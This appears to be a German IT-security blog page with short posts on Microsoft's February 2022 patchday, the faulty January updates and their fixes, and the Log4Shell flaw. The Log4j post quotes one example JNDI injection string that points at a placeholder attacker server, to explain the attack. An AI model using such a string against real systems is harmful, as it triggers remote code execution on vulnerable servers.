WeBLOG
Einträge pro Seite anzeigen | Anzahl: 154 in IT-Sicherheit vorhanden 
    1 ... 5  6  7  8  9  10  11 ... 39    
Microsoft Februar Patchday (09.02.2022)
Ein Novum bzw. ganz selten:
Keine der, mit dem gestrigen Februar-Patchday ausgelieferten, Sicherheitsupdates für Azure, Office sowie Windows wurde als "kritisch" eingestuft, sondern gelten lediglich als "hoch". Dennoch ist der Bedrohungsgrad nicht zu unterschätzen, wenngleich es momentan keine bekannten Angriffe gibt, die die gestopften Lücken ausnutzen. Das kann aber noch kommen. Nähere Infos zu den Patches, siehe Microsoft Security Update Summary.

Seit langem auch neu:
Bisher sind keine Probleme mit den Patches bekannt, was man so gar nicht mehr gewohnt ist. Hoffen wir, es bleibt dabei. Normalerweise steigt der Blutdruck jedes Admins nach dem zweiten Dienstag im Monat (Patchday), weil die sich fragen, was wohl mit der Installation der Fixes nicht mehr funktionieren und welche Mehrarbeit es erfordern wird, die Systeme wieder zum Laufen zu bringen.

Fixes für die Januar-MS-Patches (18.01.2022)
Wie in diesem Beitrag berichtet, gab es mit den Januar-Sicherheitsupdates vom 11.01.2022 massive Probleme. Microsoft hat am gestrigen Abend (17.01.2022) Patches für die Patches ausgeliefert, welche die Schwierigkeiten beseitigen sollen. Die Installation ist jeweils optional, d.h. erfolgt nicht automatisch. Nachstehend eine Liste der Sonderupdates (Out-of-Band) mit Links zu den Supportbeiträgen der Redmonder:

Weiterlesen...

Massive Probleme mit MS-Sicherheitsupdates vom Januar 2022 (13.01.2022)
Die letzten Windows-Sicherheitsupdates machen extremen Ärger. Vor allem Domain Controller unter Windows-Server-Systemen (2012 R2, 2016, 2019 und 2022) fallen in Boot-Schleifen.

Eigentlich sollte der bekannte Active Directory-Bug beseitigt werden und herausgekommen sind völlig unbrauchbare Server.

Anwender, die VPN-Verbindungen mit L2TP over IPSEC nutzen, werden ebenfalls enttäucht sein, denn diese funktionieren nicht mehr. Dies betrifft auch Windows 10 und 11.


Weiterlesen...

Log4j und die Log4Shell-Lücke (14.12.2021)
Der Fehler liegt in der "Log4Shell" in der weit verbreiteten Java-Logging-Bibliothek "Log4j". Es lässt sich quasi beliebiger Code ausführen und das dazu noch sehr einfach. In der Java-Welt kommt diese Bibliothek häufig vor, um Prozesse zu protokollieren und etwaige Fehler zu finden.

Das Problem dabei ist, dass "Log4Shell" nicht einfach nur schreibt, sondern darüber hinaus versucht den Protokolltext zu interpretieren. Enthält dieser z.B. die Zeichenfolge "${jndi:ldap://angreifer.server.de/a}", dann ist das Kind in den Brunnen gefallen, weil der Dienst den Server "angreifer.server.de" kontaktiert und von diesem ungefragt Java-Code entgegennimmt und ausführt.


Weiterlesen...

    1 ... 5  6  7  8  9  10  11 ... 39